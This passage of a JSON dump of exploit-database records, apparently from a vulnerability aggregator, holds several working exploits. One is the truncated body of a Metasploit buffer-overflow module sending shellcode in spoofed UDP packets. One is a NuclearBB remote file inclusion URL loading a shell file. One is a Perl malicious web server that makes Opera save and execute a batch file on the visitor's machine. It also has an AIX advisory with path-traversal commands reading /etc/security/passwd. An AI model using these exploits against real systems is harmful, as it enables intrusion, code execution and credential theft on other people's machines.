2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif (target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "3c6a8d7871a26d25fc3baf3434df41d3", "key": "href"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "5c332f906abeecc92a7bcff7e9d88720", "key": "sourceData"}, {"hash": "eb5bd49a56945770ae0d7eee92cc7daf", "key": "sourceHref"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-01-03T15:19:58", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-09-11T00:00:00", "published": "2007-09-11T00:00:00", "id": "1337DAY-ID-2128", "href": "https://0day.today/exploit/description/2128", "type": "zdt", "title": "NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability", "sourceData": "=================================================================\r\nNuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability\r\n=================================================================\r\n\r\n\r\n\r\nVuln Product: NuclearBB Alpha 2\r\nVendor: http://www.nuclearbb.com/\r\nVulnerability Type: Remote File Inclusion\r\nAutor: Infection\r\nTeam: Rootshell Security Team\r\nVulnerable file: /NuclearBB/tasks/send_queued_emails.php\r\nExploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?\r\nMethod: get\r\nRegister_globals: On\r\nVulnerable variable: root_path\r\nLine number: 14\r\nLines:\r\n----------------------------------------------\r\nrequire(\"$root_path/inc/functions_email.php\");\r\n$mail = new email;\r\n----------------------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2128"}, {"lastseen": "2018-01-04T15:01:26", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2003-11-22T00:00:00", "published": "2003-11-22T00:00:00", "id": "1337DAY-ID-8364", "href": "https://0day.today/exploit/description/8364", "type": "zdt", "title": "Opera 7.22 File Creation and Execution Exploit (Malicious Webserver)", "sourceData": "====================================================================\r\nOpera 7.22 File Creation and Execution Exploit (Malicious Webserver)\r\n====================================================================\r\n\r\n#!/usr/bin/perl\r\n##################################################\r\n#\r\n# Sample code of\r\n# \"[Opera 7] Arbitrary File Auto-Saved Vulnerability.\"\r\n# \r\n# This Exploit will run a webserver that will create and execute a batch \r\n# file on the victim's computer when visiting this malicious server\r\n#\r\n# This perl script is a small HTTP server for a check ofthe vulnerability.\r\n# BTW, you can exploit this vulnerability without a server like this \r\n# if your apache or etc., allow a request URL that contains '..'.\r\n#\r\n# Tested on :\r\n# Opera 7.22\r\n# Opera 7.21\r\n# Opera 7.20\r\n# Opera 7.1X\r\n# Opera 7.0X\r\n#\r\n# with Active Perl 5.8.0 on Windows 2000 Pro SP4 JP.\r\n# (maybe need Perl 5.6 or later)\r\n#\r\n# Usage :\r\n# [0] Execute \"perl this_script 10080\" on a console,\r\n# this server starts to listen in port 10080.\r\n# [1] Opera opens \"http://127.0.0.1:10080/\".\r\n# [2] Click link.\r\n# [3] Auto-saved an arbitrary file on a root directory\r\n# of Local Disk ...\r\n#\r\n# 2003/11/15\r\n# written by nesumin <nesumin softhome net>\r\n# public on www.k-otik.com\r\n#\r\n###################################################\r\nuse HTTP::Daemon;\r\nuse HTTP::Status;\r\n\r\nuse constant URL => '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C_opera_.bat';\r\n\r\nuse constant FILE_CONTENT => qq~\\@echo off\\x0D\\x0Aecho \"Love & Peace :-)\"\\x0D\\x0A\\@pause~;\r\nuse constant RES_HEADERS => qw(Pragma no-cache Connection close);\r\nuse constant REUSE => 1;\r\nuse constant VIEW_DATA => 0;\r\n\r\n\r\nmy @MIMETYPES = qw(\r\napplication/x-opera-configuration-keyboard\r\napplication/x-opera-configuration-menu\r\napplication/x-opera-configuration-mouse\r\napplication/x-opera-configuration-toolbar\r\napplication/x-opera-configuration-skin\r\napplication/x-opera-skin\r\n);\r\nmy $port = ($ARGV[0] || 10080) + 0;\r\ndie(\"port is not correct\") unless (0 < $port && $port < 65536);\r\n\r\nmy $daemon = new HTTP::Daemon(LocalPort=>$port, Reuse=>REUSE)\r\nor die(\"HTTP::Daemon->new() error : $!.\\n\");\r\nselect(STDERR);\r\nprintf(\"[*] server started on %d.\\n\", $daemon->sockport());\r\n\r\nwhile (my $ccon = $daemon->accept()) {\r\nprintf(\"[*] incoming client : from %s:%d(%08X).\\n\",\r\n inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);\r\nif (my $req = $ccon->get_request()) {\r\n print(\"\\n[*] request received...\\n\", map{\" >> $_\\n\"}\r\n ($req->as_string() =~ /^([^\\r\\n]+)/mg)) if (VIEW_DATA);\r\n if ($req->method eq 'GET') {\r\n my $url = URL;\r\n my $res = new HTTP::Response(200, 'OK', new HTTP::Headers(RES_HEADERS));\r\n $res->protocol(\"HTTP/1.0\");\r\n if ($req->url->path eq '/') {\r\n $res->header('Content-type'=>'text/html');\r\n $res->content(qq~<a href=\"$url\">Click here</a>~);\r\n \r\n } else {\r\n\r\n my $mimetype = $MIMETYPES[rand(@MIMETYPES)];\r\n if ($req->header('User-Agent')=~m~Opera[\\s+/]((\\d\\.\\d)\\d)~i){\r\n # Opera 7.0x\r\n if ($2 eq \"7.0\") {\r\n $url .= '*.zip';# '*' is a special char :-)\r\n $mimetype = $MIMETYPES[$#MIMETYPES];\r\n # Opera 7.22\r\n } elsif ($1 eq \"7.22\") {\r\n $mimetype = $MIMETYPES[rand(@MIMETYPES-2)];\r\n }\r\n }\r\n\r\n $res->header('Content-type'=>$mimetype);\r\n $res->content(FILE_CONTENT);\r\n }\r\n $ccon->send_response($res);\r\n print(\"\\n[*] response sent...\\n\", map{\" >> $_\\n\"}\r\n ($res->as_string() =~ /^([^\\r\\n]+)/mg)) if (VIEW_DATA);\r\n } else {\r\n $ccon->send_error(RC_METHOD_NOT_ALLOWED);\r\n }\r\n}\r\nprintf(\"[*] client closed : from %s:%d (%08X).\\n\",\r\n inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);\r\n$ccon->close();\r\nundef($ccon);\r\n}\r\nprint(\"[*] server closed.\\n\");\r\n$daemon->close();\r\nundef($daemon);\r\n\r \n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8364"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "description": "Title:[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities\r\n\r\nAffected version : aix5.3 ml03,Other versions not test,\r\n should also be affected.\r\nVendor: http://www.ibm.com/\r\nWhere: Local\r\n\r\nXFOCUS (http://www.xfocus.org) had already discovered\r\nsome vulnerabilities in getCommand&getShell.\r\n\r\nAfter apply newest patch,getCommand&getShell still have two\r\nvulnerabilities,That is\r\n1: exploit that,a attacker can determine file be exist or not,which\r\nshould can't readed\r\n2: exploit that,a attacker can read in any shell document(include no\r\npermission file) has the cd operation the following partial content.\r\n\r\nexample test:\r\n-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd\r\n-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa\r\nfopen: No such file or directory\r\n-bash-3.00$ ls -ld /etc/security/\r\ndrwxr-x--- 4 root security 512 2005-12-22 21:09 /etc/security/\r\n-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40\r\n/tmp/k.sh\r\n-bash-3.00$./getCommand.new ../../../../../tmp/k.sh\r\n\r\nps -ef > /tmp/log. $$\r\ngrep test /tmp/log.\r\n$$ rm /tmp/log. $$\r\n\r\n-bash-3.00$\r\n\r\n\r\nTIME LINE:\r\nDecember,26 2005 - Initial vendor notification\r\n.....Waiting.....Waiting....\r\nJanuary 1, 2006 - Public disclosure(vendor not reply)\r\n\r\n--EOF\r\n\r\n\r\n-- \r\n\r\nKind Regards,\r\n\r\n---\r\nXFOCUS Security Team\r\nhttp://www.xfocus.org\r\n", "modified": "2006-01-03T00:00:00", "published": "2006-01-03T00:00:00", "id": "SECURITYVULNS:DOC:10865", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10865", "title": "[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow in heap debugging, buffer overflows in muxatmd, slocal, file access privilege escalation in getShell and getCommand.", "modified": "2006-01-03T00:00:00", "published": "2006-01-03T00:00:00", "id": "SECURITYVULNS:VULN:5537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5537", "title": "Multiple AIX multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
